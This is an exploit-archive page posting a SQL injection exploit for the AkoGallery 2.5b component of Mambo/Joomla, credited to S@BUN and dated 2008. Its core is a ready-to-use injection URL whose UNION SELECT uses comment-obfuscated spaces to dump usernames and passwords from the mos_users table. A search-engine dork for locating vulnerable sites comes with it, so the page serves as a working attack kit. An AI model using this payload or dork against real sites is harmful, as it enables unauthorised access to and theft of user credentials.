|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | Mambo Component AkoGallery 2.5b SQL Injection Vulnerability
|
ExploitAlert : 3300
Credit : S@BUN
Date : 02.02.2008
Download
Plain text version
 Exploit Code : #########################################################################
#
#
# joomla SQL Injection(com_akogallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_akogallery"
#
########################################################################
EXPLOIT :
index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/unio
n/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,userna
me)/**/from/**/mos_users/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY
S@BUN
#########################################################################
<name>akogallery</name>
<creationDate>21.06.2004</creationDate>
<author>Arthur Konze</author>
<copyright>Copyright 2003, 2004 by Arthur Konze. Distribution
prohibited!</copyright>
<authorEmail>webmaster@mamboportal.com</authorEmail>
<authorUrl>www.mamboportal.com</authorUrl>
<version>2.5 beta</version>
<description>AkoGallery is a fully integrated Mambo picture gallery
component.</description>
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|